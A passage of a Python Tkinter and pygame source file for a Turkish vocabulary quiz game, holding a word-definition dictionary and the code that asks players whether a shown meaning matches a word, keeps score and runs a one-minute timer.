güçsüz.\",\r\n \"aç\":\"Yemek yeme ihtiyacı olan veya yemesi gereken, tok karşıtı.\",\r\n \"açık\":\"Açılmış, kapalı olmayan, kapalı karşıtı.\",\r\n \"açıklamak\":\"Bir konuyla ilgili olarak gerekli bilgileri vermek, izah etmek.\",\r\n \"ad\":\"İsim.\",\r\n \"ada\":\"Her yanı su ile çevrilmiş kara parçası.\",\r\n \"adale\":\"Kas.\",\r\n \"adam\":\"İnsan.\",\r\n \"adet\":\"Sayı.\",\r\n \"adil\":\"Adaletli.\",\r\n \"afacan\":\"Zeki ve yaramaz (çocuk).\",\r\n \"affetmek\":\"Bağışlamak.\",\r\n \"ağ\":\"İplik, sicim, tel gibi ince şeylerden kafes biçiminde yapılmış örgü.\",\r\n \"ağabey\":\"Bir kimsenin kendinden yaşça büyük olan erkek kardeşi.\",\r\n \"ağaç\":\"Gövdesi odun veya kereste olmaya elverişli bulunan ve uzun yıllar yaşayabilen bitki.\",\r\n \"ağıl\":\"Koyun ve keçi sürülerinin gecelediği, çit veya duvarla çevrili yer.\",\r\n \"ağır\":\"Tartıda çok çeken, hafif karşıtı.\",\r\n \"ağlamak\":\"Üzüntü, acı, sevinç, pişmanlık aldanma vb.nin etkisiyle göz yaşı dökmek.\",\r\n \"ağrı\":\"Vücudun herhangi bir yerinde duyulan sürekli ve şiddetli acı.\",\r\n \"ahenk\":\"Uyum.\",\r\n \"ahır\":\"Evcil büyük baş hayvanların barındığı kapalı yer, hayvan damı.\",\r\n \"aidat\":\"Ödenti.\",\r\n \"ak\":\"Beyaz, kara ve siyah karşıtı.\",\r\n \"akçe\":\"Küçük gümüş para.\",\r\n \"akıbet\":\"Son, sonuç.\",\r\n \"akıl\":\"Düşünme, anlama ve kavrama gücü, us.\",\r\n \"akraba\":\"Kan veya evlilik yoluyla birbirine bağlı olan kimseler, hısım.\",\r\n \"akran\":\"Yaşça denk, yaşıt.\",\r\n \"akrobat\":\"Cambaz.\",\r\n \"aksi\":\"Ters, zıt, karşıt, olumsuz.\",\r\n \"akşam\":\"Gündüzün son ve gecenin ilk saatleri.\",\r\n \"aktör\":\"Erkek oyuncu.\",\r\n \"aktris\":\"Kadın oyuncu.\",\r\n \"al\":\"Kızıl alev rengi.\",\r\n \"alâmet\":\"Belirti, işaret, iz, nişan.\",\r\n \"alan\":\"Düz, açık ve geniş yer, meydan, saha.\",\r\n \"alçak\":\"Yerden uzaklığı az olan, yüksek karşıtı.\",\r\n \"aldatmak\":\"Birine verilen sözü tutmamak, yalan söylemek.\",\r\n \"âlim\":\"Bilgin.\",\r\n \"almak\":\"Bir şeyi elle veya başka bir araçla tutarak bulunduğu yerden ayırmak, kaldırmak.\",\r\n \"alo\":\"Telefonda seslenme sözü.\",\r\n \"alp\":\"Yiğit, kahraman.\",\r\n \"alt\":\"Bir şeyin yere bakan yanı, üst karşıtı.\",\r\n \"amaç\":\"Erişilmek istenilen sonuç.\",\r\n \"ambar\":\"Yiyecek ve bazı eşyanın saklandığı yer.\",\r\n \"amca\":\"Babanın erkek kardeşi.\",\r\n \"ana\":\"Çocuğu olan kadın, anne.\",\r\n \"anı\":\"Hatıra.\",\r\n \"anıt\":\"Abide.\",\r\n \"aramak\":\"Bir şeyi bulmak için uğraşmak.\",\r\n \"arzu\":\"İstek, dilek.\",\r\n \"asır\":\"Yüzyıl.\",\r\n \"aş\":\"Pişirilmiş yemek.\",\r\n \"atik\":\"Çabuk hareket eden.\",\r\n \"atlamak\":\"Sıçramak.\",\r\n \"avize\":\"Tavana asılan süslü aydınlatma aracı.\",\r\n \"ay\":\"Dünya'mızın uydusu olan gök cismi.\",\r\n \"ayaz\":\"Kuru soğuk.\",\r\n \"aygıt\":\"Alet, cihaz.\",\r\n \"ayrıntı\":\"Detay.\",\r\n \"az\":\"Çok olmayan.\",\r\n \"aza\":\"Üye.\",\r\n \"azami\":\"En çok, en yüksek.\",\r\n \"baba\":\"Çocuğu olan erkek.\",\r\n \"bağ\":\"Üzüm yetiştirilen bahçe.\",\r\n \"bahtiyar\":\"Mutlu.\",\r\n \"bavul\":\"Yolculukta kullanılan, içine eşya konulan çanta.\",\r\n \"bayat\":\"Taze olmayan.\",\r\n \"bellek\":\"Hafıza.\",\r\n \"beyaz\":\"Ak.\",\r\n \"buket\":\"Çiçek demeti.\",\r\n \"buz\":\"Suyun ısı vererek katılaşmış hali.\",\r\n \"büyüteç\":\"Cisimleri büyüten, yaklaştırıcı mercek.\",\r\n \"cahil\":\"Bilgisiz.\",\r\n \"canlı\":\"Diri.\",\r\n \"cesaret\":\"Zor işleri başarmak için kişinin kendinde duyduğu güven hali.\",\r\n \"cevap\":\"Yanıt.\",\r\n \"cılız\":\"Kuvvetsiz, çok 
zayıf.\",\r\n \"cihan\":\"Dünya.\",\r\n \"cilt\":\"Ten, deri.\",\r\n \"cüce\":\"Boyu normal boydan küçük olan.\",\r\n \"çaba\":\"Bir iş yapmak için harcanan emek, güç.\",\r\n \"çalışmak\":\"Bir şey ortaya koymak için emek harcamak.\",\r\n \"çarpmak\":\"Hızla vurmak.\",\r\n \"çarşı\":\"Alışveriş yerlerinin bulunduğu yer.\",\r\n \"çehre\":\"Yüz, surat.\",\r\n \"çekingen\":\"Ürkek, girişken olmayan.\",\r\n \"çerez\":\"Yemek dışında yenen yemiş gibi yiyecekler.\",\r\n \"çığ\":\"Dağın bir yerinden kopup yuvarlanarak büyüyen kar yığını.\",\r\n \"çığlık\":\"İnce ve keskin bir biçimde haykırış.\",\r\n \"çiftçi\":\"Toprağı ekerek geçim sağlayan kimse.\",\r\n \"çiğ\":\"Pişmemiş.\",\r\n \"çok\":\"Gereken miktardan fazla.\",\r\n \"dadı\":\"Çocuk bakan kadın.\",\r\n \"dağ\":\"Çevresine göre yüksek olan toprak ya da kaya kütlesi.\",\r\n \"dargın\":\"Gücenmiş, küsmüş.\",\r\n \"dayı\":\"Annenin erkek kardeşi.\",\r\n \"derece\":\"Isı ölçen alet.\",\r\n \"dilek\":\"İstek.\",\r\n \"dürüst\":\"Her şartta doğruluktan ayrılmayan.\",\r\n \"düş\":\"Rüya.\",\r\n \"düzine\":\"Aynı cinsten on iki parçanın oluşturduğu takım.\",\r\n \"ece\":\"Kraliçe.\",\r\n \"eğik\":\"Dik olmayan.\",\r\n \"eğri\":\"Düz olmayan.\",\r\n \"eldiven\":\"Eli, dış etkenlerden korumak için ele giyilen giysi.\",\r\n \"engel\":\"Mani.\",\r\n \"esir\":\"Tutsak.\",\r\n \"etraf\":\"Çevre, yakın yer.\",\r\n \"fakir\":\"Yoksul.\",\r\n \"feryat\":\"Haykırma, çığlık atma.\",\r\n \"felâket\":\"Büyük zararlara yol açan durum.\",\r\n \"fırtına\":\"Şiddetli rüzgar.\",\r\n \"fidan\":\"Taze, yeni gelişmeye başlamış ağaç.\",\r\n \"fiyat\":\"Bir şeyin para olarak değeri.\",\r\n \"gar\":\"Büyük tren istasyonu.\",\r\n \"gazi\":\"Düşmanla savaşıp sağ olarak kurtulan kimse.\",\r\n \"gecikmek\":\"Geç kalmak.\",\r\n \"gezi\":\"Gezmek, görmek, tanımak için yapılan yolculuk.\",\r\n \"gıda\":\"Besin.\",\r\n \"göl\":\"Dört yanı karalarla çevrili geniş su birikintisi.\",\r\n \"göz\":\"Görme organı.\",\r\n \"gürbüz\":\"Gelişmiş, iri sağlam yapılı.\",\r\n \"güz\":\"Sonbahar.\",\r\n \"hademe\":\"Hizmetli.\",\r\n \"hafıza\":\"Bellek.\",\r\n \"hafif\":\"Tartıldığında ağırlığı az olan.\",\r\n \"hâkim\":\"Yargıç.\",\r\n \"halat\":\"Kalın ip.\",\r\n \"hamal\":\"Yük taşıyarak geçimini sürdüren kimse.\",\r\n \"harp\":\"Savaş.\",\r\n \"hata\":\"Yanlışlık.\",\r\n \"hatıra\":\"Anı.\",\r\n \"hayat\":\"Yaşam.\",\r\n \"hediye\":\"Armağan.\",\r\n \"hekim\":\"Doktor.\",\r\n \"hırçın\":\"Sinirli, huysuz kimse.\",\r\n \"hız\":\"Sürat.\",\r\n \"ırak\":\"Uzak.\",\r\n \"ırmak\":\"Nehir.\",\r\n \"iade\":\"Geri verme.\",\r\n \"icat\":\"Yeni bir şey bulma.\",\r\n \"içten\":\"Samimi, yürekten, candan.\",\r\n \"ihtiyar\":\"Yaşlı.\",\r\n \"ikaz\":\"Uyarma, uyandırma.\",\r\n \"ilâve\":\"Ek.\",\r\n \"ilk\":\"En önce.\",\r\n \"imtihan\":\"Sınav.\",\r\n \"istiklâl\":\"Bağımsızlık.\",\r\n \"iz\":\"Bir şeyin geçtiği yerde bıraktığı işaret.\",\r\n \"izlemek\":\"Arkasından gitmek, takip etmek.\",\r\n \"kabahat\":\"Suç, kusur.\",\r\n \"kaçmak\":\"Tehlikeli bir durumdan hızlıca uzaklaşmak.\",\r\n \"kalp\":\"Yürek.\",\r\n \"kapmak\":\"Ansızın yakalayıp almak.\",\r\n \"kara\":\"Siyah.\",\r\n \"kasa\":\"Para, değerli eşyalar saklamaya yarayan çelik dolap.\",\r\n \"kâşif\":\"Keşfeden, bulan.\",\r\n \"kaşkol\":\"Boyun atkısı.\",\r\n \"katı\":\"Yumuşak olmayan, sert.\",\r\n \"kaybetmek\":\"Yitirmek.\",\r\n \"kaygı\":\"Üzüntü, tasa.\",\r\n \"kelime\":\"Sözcük.\",\r\n \"kent\":\"Şehir.\",\r\n \"kırık\":\"Kırılmış olan.\",\r\n \"kısa\":\"Boyu az olan.\",\r\n \"kızgın\":\"Öfkeli, sinirli.\",\r\n \"koç\":\"Erkek 
koyun.\",\r\n \"kolye\":\"Boyna takılan süs eşyası. Gerdanlık.\",\r\n \"koşmak\":\"İleriye doğru hızla gitmek.\",\r\n \"kundura\":\"Ayakkabı.\",\r\n \"lüzum\":\"Gerek, gereklilik, lazım olma.\",\r\n \"mağara\":\"İn.\",\r\n \"mana\":\"Anlam.\",\r\n \"mazaret\":\"Özür.\",\r\n \"mektep\":\"Okul.\",\r\n \"memleket\":\"Ülke.\",\r\n \"merasim\":\"Tören.\",\r\n \"mert\":\"Yiğit. Sözüne güvenilir.\",\r\n \"mesafe\":\"Ara, uzaklık.\",\r\n \"millet\":\"Ulus.\",\r\n \"mutlaka\":\"Kesinlikle.\",\r\n \"müddet\":\"Süre.\",\r\n \"mükemmel\":\"Kusursuz, eksiksiz.\",\r\n \"münakaşa\":\"Tartışma.\",\r\n \"müsabaka\":\"Yarışma.\",\r\n \"müsait\":\"Uygun.\",\r\n \"nehir\":\"Irmak.\",\r\n \"netice\":\"Sonuç.\",\r\n \"noksan\":\"Eksik.\",\r\n \"numune\":\"Örnek.\",\r\n \"oğlak\":\"Keçi yavrusu.\",\r\n \"okul\":\"Mektep.\",\r\n \"olanak\":\"İmkan.\",\r\n \"orman\":\"Ağaçlarla kaplı geniş alan.\",\r\n \"ozan\":\"Halk şairi.\",\r\n \"ödül\":\"Bir başarıya verilen mükafat.\",\r\n \"öğüt\":\"Nasihat.\",\r\n \"öneri\":\"Bir konuda, kabul edilmesi için öne sürülen düşünce.\",\r\n \"öykü\":\"Hikaye.\",\r\n \"özen\":\"İtina.\",\r\n \"pabuç\":\"Ayakkabı.\",\r\n \"seyahat\":\"Yolculuk, gezi.\",\r\n \"sıhhat\":\"Sağlık.\",\r\n \"sözcük\":\"Kelime.\",\r\n \"surat\":\"Yüz.\",\r\n \"şahit\":\"Tanık.\",\r\n \"şen\":\"Sevinçli, canlı, mutlu kimse.\",\r\n \"tabip\":\"Hekim. Doktor.\",\r\n \"tamir\":\"Onarma.\",\r\n \"tebessüm\":\"Gülümseme.\",\r\n \"ucuz\":\"Pahalı olmayan.\",\r\n \"uslu\":\"Yaramaz olmayan.\",\r\n \"vadi\":\"İki dağ arasında bulunan uzun geçit.\",\r\n \"valide\":\"Anne. Ana.\",\r\n \"vasıta\":\"Araç.\",\r\n \"vazife\":\"Görev.\",\r\n \"vaziyet\":\"Durum, konum, tavır.\",\r\n \"volkan\":\"Yanardağ.\",\r\n \"yanardağ\":\"Volkan.\",\r\n \"yarar\":\"Fayda.\",\r\n \"yargıç\":\"Hakim.\",\r\n \"yem\":\"Hayvan yiyeceği.\",\r\n \"yiğit\":\"Yürekli, güçlü.\",\r\n \"yitirmek\":\"Kaybetmek.\",\r\n \"yoksul\":\"Fakir\",\r\n \"yüz\":\"Surat.\",\r\n \"zannetmek\":\"Sanmak.\",\r\n \"zelzele\":\"Deprem.\"}\r\n \r\nkelime=[\"abaküs\",\"abartmak\",\"abide\",\"abla\",\"abone\",\"abur cubur\",\"acaba\",\"acele\",\"acemi\",\"acı\",\"acıkmak\",\"acılı\",\"acil\",\"âciz\",\"aç\",\"açık\",\"açıklamak\",\"ad\",\"ada\",\r\n \"adale\",\"adam\",\"adet\",\"adil\",\"afacan\",\"affetmek\",\"ağ\",\"ağabey\",\"ağaç\",\"ağıl\",\"ağır\",\"ağlamak\",\"ağrı\",\"ahenk\",\"ahır\",\"aidat\",\"ak\",\"akçe\",\"akıbet\",\"akıl\",\r\n \"akraba\",\"akran\",\"akrobat\",\"aksi\",\"akşam\",\"aktör\",\"aktris\",\"al\",\"alâmet\",\"alan\",\"alçak\",\"aldatmak\",\"âlim\",\"almak\",\"alo\",\"alp\",\"alt\",\"amaç\",\"ambar\",\"amca\",\r\n \"ana\",\"anı\",\"anıt\",\"aramak\",\"arzu\",\"asır\",\"aş\",\"atik\",\"atlamak\",\"avize\",\"ay\",\"ayaz\",\"aygıt\",\"ayrıntı\",\"az\",\"aza\",\"azami\",\"baba\",\"bağ\",\"bahtiyar\",\"bavul\",\r\n \"bayat\",\"bellek\",\"beyaz\",\"buket\",\"buz\",\"büyüteç\",\"cahil\",\"canlı\",\"cesaret\",\"cevap\",\"cılız\",\"cihan\",\"cilt\",\"cüce\",\"çaba\",\"çalışmak\",\"çarpmak\",\"çarşı\",\r\n \"çehre\",\"çekingen\",\"çerez\",\"çığ\",\"çığlık\",\"çiftçi\",\"çiğ\",\"çok\",\"dadı\",\"dağ\",\"dargın\",\"dayı\",\"derece\",\"dilek\",\"dürüst\",\"düş\",\"düzine\",\"ece\",\"eğik\",\"eğri\",\r\n \"eldiven\",\"engel\",\"esir\",\"etraf\",\"fakir\",\"feryat\",\"felâket\",\"fırtına\",\"fidan\",\"fiyat\",\"gar\",\"gazi\",\"gecikmek\",\"gezi\",\"gıda\",\"göl\",\"göz\",\"gürbüz\",\"güz\",\r\n 
\"hademe\",\"hafıza\",\"hafif\",\"hâkim\",\"halat\",\"hamal\",\"harp\",\"hata\",\"hatıra\",\"hayat\",\"hediye\",\"hekim\",\"hırçın\",\"hız\",\"ırak\",\"ırmak\",\"iade\",\"icat\",\"içten\",\r\n \"ihtiyar\",\"ikaz\",\"ilâve\",\"ilk\",\"imtihan\",\"istiklâl\",\"iz\",\"izlemek\",\"kabahat\",\"kaçmak\",\"kalp\",\"kapmak\",\"kara\",\"kasa\",\"kâşif\",\"kaşkol\",\"katı\",\"kaybetmek\",\r\n \"kaygı\",\"kelime\",\"kent\",\"kırık\",\"kısa\",\"kızgın\",\"koç\",\"kolye\",\"koşmak\",\"kundura\",\"lüzum\",\"mağara\",\"mana\",\"mazaret\",\"mektep\",\"memleket\",\"merasim\",\"mert\",\r\n \"mesafe\",\"millet\",\"mutlaka\",\"müddet\",\"mükemmel\",\"münakaşa\",\"müsabaka\",\"müsait\",\"nehir\",\"netice\",\"noksan\",\"numune\",\"oğlak\",\"okul\",\"olanak\",\"orman\",\"ozan\",\r\n \"ödül\",\"öğüt\",\"öneri\",\"öykü\",\"özen\",\"pabuç\",\"seyahat\",\"sıhhat\",\"sözcük\",\"surat\",\"şahit\",\"şen\",\"tabip\",\"tamir\",\"tebessüm\",\"ucuz\",\"uslu\",\"vadi\",\"valide\",\r\n \"vasıta\",\"vazife\",\"vaziyet\",\"volkan\",\"yanardağ\",\"yarar\",\"yargıç\",\"yem\",\"yiğit\",\"yitirmek\",\"yoksul\",\"yüz\",\"zannetmek\",\"zelzele\"]\r\n\r\ndo=0\r\nya=0\r\n\r\ndef başla1():\r\n label=Label(text=\" \",fg=\"white\",bg=\"blue\",font=\"Helvetica 20 bold\")\r\n label.place(relx = 0.05, rely = 0.1)\r\n\r\n label=Label(text=\" \",fg=\"yellow\",bg=\"red\",font=\"Helvetica 20 bold\")\r\n label.place(relx = 0.05, rely = 0.20)\r\n\r\n pygame.mixer.music.load(\"hello.mp3\")\r\n pygame.mixer.music.play(-1)\r\n\r\n for s in random.sample(range(0,2),1):\r\n if s == 0:\r\n for d in random.sample((kelime),1): \r\n for k in random.sample((kelime),1):\r\n label=Label(text=\"Altta anlamı verilen '\"+str(k)+\"' kelimesinin anlamı doğru ise DOĞRU kutucuğuna, yanlış ise YANLIŞ kutucuğuna basınız.\",fg=\"white\",bg=\"blue\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.05, rely = 0.1)\r\n \r\n label=Label(text=sözlük[d],fg=\"yellow\",bg=\"red\",font=\"Helvetica 20 bold\")\r\n label.place(relx = 0.05, rely = 0.20)\r\n\r\n def doğru(): \r\n global do,ya\r\n if sözlük[d] == sözlük[k]:\r\n do+=1\r\n label=Label(text=do,fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.72, rely = 0.9)\r\n \r\n pygame.mixer.music.load(\"alkis.mp3\")\r\n pygame.mixer.music.play()\r\n\r\n time.sleep(2)\r\n\r\n başla1()\r\n \r\n else:\r\n ya+=1\r\n label=Label(text=ya,fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.82, rely = 0.9)\r\n \r\n pygame.mixer.music.load(\"hata.mp3\")\r\n pygame.mixer.music.play()\r\n\r\n time.sleep(2)\r\n\r\n başla1()\r\n \r\n def yanlış():\r\n global do,ya\r\n if sözlük[d]!= sözlük[k]:\r\n do+=1\r\n label=Label(text=do,fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.72, rely = 0.9)\r\n \r\n pygame.mixer.music.load(\"alkis.mp3\")\r\n pygame.mixer.music.play()\r\n\r\n time.sleep(2)\r\n\r\n başla1()\r\n\r\n else:\r\n ya+=1\r\n label=Label(text=ya,fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.82, rely = 0.9)\r\n \r\n pygame.mixer.music.load(\"hata.mp3\")\r\n pygame.mixer.music.play()\r\n\r\n time.sleep(2)\r\n\r\n başla1()\r\n \r\n birer = Button()\r\n birer.config(text=\"DOĞRU\",command=doğru,width='8',fg=\"white\",bg=\"green\",font=\"Helvetica 30 bold\")\r\n birer.place(relx = 0.3, rely = 0.5)\r\n\r\n birer1 = Button()\r\n birer1.config(text=\"YANLIŞ\",command=yanlış,width='8',fg=\"white\",bg=\"red\",font=\"Helvetica 30 bold\")\r\n birer1.place(relx = 0.5, rely = 0.5)\r\n\r\n else:\r\n for d in 
random.sample((kelime),1): \r\n for k in random.sample((kelime),1):\r\n label=Label(text=\"Altta anlamı verilen '\"+str(d)+\"' kelimesinin anlamı doğru ise DOĞRU kutucuğuna, yanlış ise YANLIŞ kutucuğuna basınız.\",fg=\"white\",bg=\"blue\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.05, rely = 0.1)\r\n \r\n label=Label(text=sözlük[d],fg=\"yellow\",bg=\"red\",font=\"Helvetica 20 bold\")\r\n label.place(relx = 0.05, rely = 0.20)\r\n\r\n def doğru(): \r\n global do,ya\r\n if sözlük[d] == sözlük[d]:\r\n do+=1\r\n label=Label(text=do,fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.72, rely = 0.9)\r\n \r\n pygame.mixer.music.load(\"alkis.mp3\")\r\n pygame.mixer.music.play()\r\n\r\n time.sleep(2)\r\n\r\n başla1() \r\n\r\n def yanlış():\r\n global do,ya\r\n \r\n ya+=1\r\n label=Label(text=ya,fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.82, rely = 0.9)\r\n \r\n pygame.mixer.music.load(\"hata.mp3\")\r\n pygame.mixer.music.play()\r\n\r\n time.sleep(2)\r\n\r\n başla1()\r\n \r\n birer = Button()\r\n birer.config(text=\"DOĞRU\",command=doğru,width='8',fg=\"white\",bg=\"green\",font=\"Helvetica 30 bold\")\r\n birer.place(relx = 0.3, rely = 0.5)\r\n\r\n birer1 = Button()\r\n birer1.config(text=\"YANLIŞ\",command=yanlış,width='8',fg=\"white\",bg=\"red\",font=\"Helvetica 30 bold\")\r\n birer1.place(relx = 0.5, rely = 0.5)\r\n\r\ndef başla():\r\n global do,ya\r\n\r\n do=0\r\n ya=0\r\n label=Label(text=\" \",fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.72, rely = 0.9)\r\n \r\n label=Label(text=\" \",fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.82, rely = 0.9)\r\n\r\n label=Label(text=\"0\",fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.72, rely = 0.9)\r\n \r\n label=Label(text=\"0\",fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.82, rely = 0.9)\r\n \r\n label=Label(text=\" \",fg=\"white\",bg=\"blue\",font=\"Helvetica 20 bold\")\r\n label.place(relx = 0.05, rely = 0.1)\r\n\r\n label=Label(text=\" \",fg=\"yellow\",bg=\"red\",font=\"Helvetica 20 bold\")\r\n label.place(relx = 0.05, rely = 0.20)\r\n\r\n pygame.mixer.music.load(\"hello.mp3\")\r\n pygame.mixer.music.play(-1)\r\n\r\n for s in random.sample(range(0,2),1):\r\n if s == 0:\r\n for d in random.sample((kelime),1): \r\n for k in random.sample((kelime),1):\r\n label=Label(text=\"Altta anlamı verilen '\"+str(k)+\"' kelimesinin anlamı doğru ise DOĞRU kutucuğuna, yanlış ise YANLIŞ kutucuğuna basınız.\",fg=\"white\",bg=\"blue\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.05, rely = 0.1)\r\n \r\n label=Label(text=sözlük[d],fg=\"yellow\",bg=\"red\",font=\"Helvetica 20 bold\")\r\n label.place(relx = 0.05, rely = 0.20)\r\n\r\n def doğru(): \r\n global do,ya\r\n if sözlük[d] == sözlük[k]:\r\n do+=1\r\n label=Label(text=do,fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.72, rely = 0.9)\r\n \r\n pygame.mixer.music.load(\"alkis.mp3\")\r\n pygame.mixer.music.play()\r\n\r\n time.sleep(2)\r\n\r\n başla1()\r\n \r\n else:\r\n ya+=1\r\n label=Label(text=ya,fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.82, rely = 0.9)\r\n \r\n pygame.mixer.music.load(\"hata.mp3\")\r\n pygame.mixer.music.play()\r\n\r\n time.sleep(2)\r\n\r\n başla1()\r\n \r\n def yanlış():\r\n global do,ya\r\n if sözlük[d]!= sözlük[k]:\r\n do+=1\r\n label=Label(text=do,fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 
0.72, rely = 0.9)\r\n \r\n pygame.mixer.music.load(\"alkis.mp3\")\r\n pygame.mixer.music.play()\r\n\r\n time.sleep(2)\r\n\r\n başla1()\r\n\r\n else:\r\n ya+=1\r\n label=Label(text=ya,fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.82, rely = 0.9)\r\n \r\n pygame.mixer.music.load(\"hata.mp3\")\r\n pygame.mixer.music.play()\r\n\r\n time.sleep(2)\r\n\r\n başla1()\r\n \r\n birer = Button()\r\n birer.config(text=\"DOĞRU\",command=doğru,width='8',fg=\"white\",bg=\"green\",font=\"Helvetica 30 bold\")\r\n birer.place(relx = 0.3, rely = 0.5)\r\n\r\n birer1 = Button()\r\n birer1.config(text=\"YANLIŞ\",command=yanlış,width='8',fg=\"white\",bg=\"red\",font=\"Helvetica 30 bold\")\r\n birer1.place(relx = 0.5, rely = 0.5)\r\n \r\n b1=59\r\n a1=9\r\n while True:\r\n label1.config(text=\"Kalan saniye %d:%d \"%(b1,a1),font=\"Helvetica 15 bold\")\r\n a1-=1\r\n time.sleep(0.105)\r\n buton1.update() \r\n if a1<0:\r\n b1-=1\r\n a1=9\r\n if b1<0:\r\n pygame.mixer.music.load(\"Gong.mp3\")\r\n pygame.mixer.music.play()\r\n birer = Button()\r\n birer.config(text=\"DOĞRU\",width='8',fg=\"white\",bg=\"green\",font=\"Helvetica 30 bold\")\r\n birer.place(relx = 0.3, rely = 0.5)\r\n\r\n birer1 = Button()\r\n birer1.config(text=\"YANLIŞ\",width='8',fg=\"white\",bg=\"red\",font=\"Helvetica 30 bold\")\r\n birer1.place(relx = 0.5, rely = 0.5)\r\n \r\n break\r\n else:\r\n for d in random.sample((kelime),1): \r\n for k in random.sample((kelime),1):\r\n label=Label(text=\"Altta anlamı verilen '\"+str(d)+\"' kelimesinin anlamı doğru ise DOĞRU kutucuğuna, yanlış ise YANLIŞ kutucuğuna basınız.\",fg=\"white\",bg=\"blue\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.05, rely = 0.1)\r\n \r\n label=Label(text=sözlük[d],fg=\"yellow\",bg=\"red\",font=\"Helvetica 20 bold\")\r\n label.place(relx = 0.05, rely = 0.20)\r\n\r\n def doğru(): \r\n global do,ya\r\n if sözlük[d] == sözlük[d]:\r\n do+=1\r\n label=Label(text=do,fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.72, rely = 0.9)\r\n \r\n pygame.mixer.music.load(\"alkis.mp3\")\r\n pygame.mixer.music.play()\r\n\r\n time.sleep(2)\r\n\r\n başla1() \r\n\r\n def yanlış():\r\n global do,ya\r\n \r\n ya+=1\r\n label=Label(text=ya,fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.82, rely = 0.9)\r\n \r\n pygame.mixer.music.load(\"hata.mp3\")\r\n pygame.mixer.music.play()\r\n\r\n time.sleep(2)\r\n\r\n başla1()\r\n \r\n birer = Button()\r\n birer.config(text=\"DOĞRU\",command=doğru,width='8',fg=\"white\",bg=\"green\",font=\"Helvetica 30 bold\")\r\n birer.place(relx = 0.3, rely = 0.5)\r\n\r\n birer1 = Button()\r\n birer1.config(text=\"YANLIŞ\",command=yanlış,width='8',fg=\"white\",bg=\"red\",font=\"Helvetica 30 bold\")\r\n birer1.place(relx = 0.5, rely = 0.5)\r\n \r\n b1=59\r\n a1=9\r\n while True:\r\n label1.config(text=\"Kalan saniye %d:%d \"%(b1,a1),font=\"Helvetica 15 bold\")\r\n a1-=1\r\n time.sleep(0.105)\r\n buton1.update() \r\n if a1<0:\r\n b1-=1\r\n a1=9\r\n if b1<0:\r\n pygame.mixer.music.load(\"Gong.mp3\")\r\n pygame.mixer.music.play()\r\n birer = Button()\r\n birer.config(text=\"DOĞRU\",width='8',fg=\"white\",bg=\"green\",font=\"Helvetica 30 bold\")\r\n birer.place(relx = 0.3, rely = 0.5)\r\n\r\n birer1 = Button()\r\n birer1.config(text=\"YANLIŞ\",width='8',fg=\"white\",bg=\"red\",font=\"Helvetica 30 bold\")\r\n birer1.place(relx = 0.5, rely = 0.5)\r\n \r\n break\r\n \r\nlabel=Label(text=\"KELİME ANLAMINI BULMA OYUNU\",fg=\"red\",bg=\"yellow\",font=\"Helvetica 20 bold\")\r\nlabel.place(relx = 
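# --- Illustrative sketch, not part of the original: the countdown above blocks in a
# while/time.sleep loop and keeps the UI alive only via buton1.update(), freezing
# every other callback for the full minute. Tk's after() runs the same
# tenth-of-a-second tick without blocking mainloop(); `pencere` is the Tk root
# created elsewhere in this file, and `on_done` stands in for the gong step.
def countdown(label, tenths=600, on_done=None):
    label.config(text="Kalan saniye %d:%d " % (tenths // 10, tenths % 10))
    if tenths > 0:
        pencere.after(100, countdown, label, tenths - 1, on_done)
    elif on_done is not None:
        on_done()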
0.3, rely = 0.0) \r\n \r\nlabel=Label(text=\"0 \",fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\nlabel.place(relx = 0.82, rely = 0.9)\r\n\r\nlabel=Label(text=\"YANLIŞ\",fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\nlabel.place(relx = 0.8, rely = 0.85)\r\n\r\nlabel=Label(text=\"0 \",fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\nlabel.place(relx = 0.72, rely = 0.9)\r\n\r\nlabel=Label(text=\"DOĞRU\",fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\nlabel.place(relx = 0.7, rely = 0.85)\r\n\r\nbuton=Button()\r\nbuton.config(text=\"ÇIKIŞ\",command=pencere.destroy,width='10',bg=\"yellow\",fg=\"red\",font=('Helvetica',15,\"bold\"))\r\nbuton.place(relx = 0.9, rely = 0.9)\r\n\r\nlabel=Label(text=\"gokselgursu@gmail.com --- http://www.egitimhane.com/\",fg=\"yellow\",bg=\"blue\")\r\nlabel.place(relx = 0.66, rely = 0.95)\r\n\r\nlabel1=Label(text=\"Kalan saniye 60.0\",fg=\"red\",font=\"Helvetica 15 bold\")\r\nlabel1.place(relx = 0.42, rely = 0.92)\r\n\r\nbuton1=Button()\r\nbuton1.config(text=\"BAŞLAT\", command=başla,width='20',bg=\"red\",fg=\"yellow\",font=('Helvetica',15,\"bold\"))\r\nbuton1.place(relx = 0.4, rely = 